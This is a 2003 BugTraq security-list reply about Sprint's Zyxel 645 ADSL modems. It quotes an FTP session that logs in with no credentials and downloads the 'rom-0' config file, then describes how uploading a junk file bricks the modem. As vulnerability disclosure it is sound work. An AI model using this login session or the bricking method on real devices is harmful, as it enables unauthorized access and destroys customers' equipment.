BugTraq
SPRINT ADSL [Zyxel 645 Series Modem] Jan 23 2003 03:36PM
http-equiv@excite.com (http-equiv malware com) (1 replies)
Re: SPRINT ADSL [Zyxel 645 Series Modem] Jan 23 2003 04:05PM
Raymond Dijkxhoorn (raymond prolocation net)
Hi!

> shows 800 out of 2000 [of 100,000 or so] affected modems. Closer
> examination confirms:

> ftp> open malware.com
> Connected to malware.com.
> 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
> User (malware.com:(none)):
> 331 Enter PASS command
> Password:
> 230 Logged in
> ftp> get rom-0
> 200 Port command okay
> 150 Opening data connection for RETR rom-0
> 226 File sent OK
> ftp: 16384 bytes received in 2.03Seconds 8.07Kbytes/sec.
> ftp>

It's even worse: if you upload a config file, same size as the rom-0 file,
but filled with total crap, the modem reboots (it does that automatically
after uploading a new image) and after that the modem is broken. You ONLY
have the ability to upload a new image via a serial port then, and most
customers just have to bring back their unit. The modem is waiting after
upload of a broken image, with an x-modem session. And there it ends. Even
if you upload the previous image it won't work. Nice stuff :(

There are two files you can toy around with in this case, ras and rom-0.
ras is the image file, rom-0 is 'just' the config.

Bye,
Raymond.
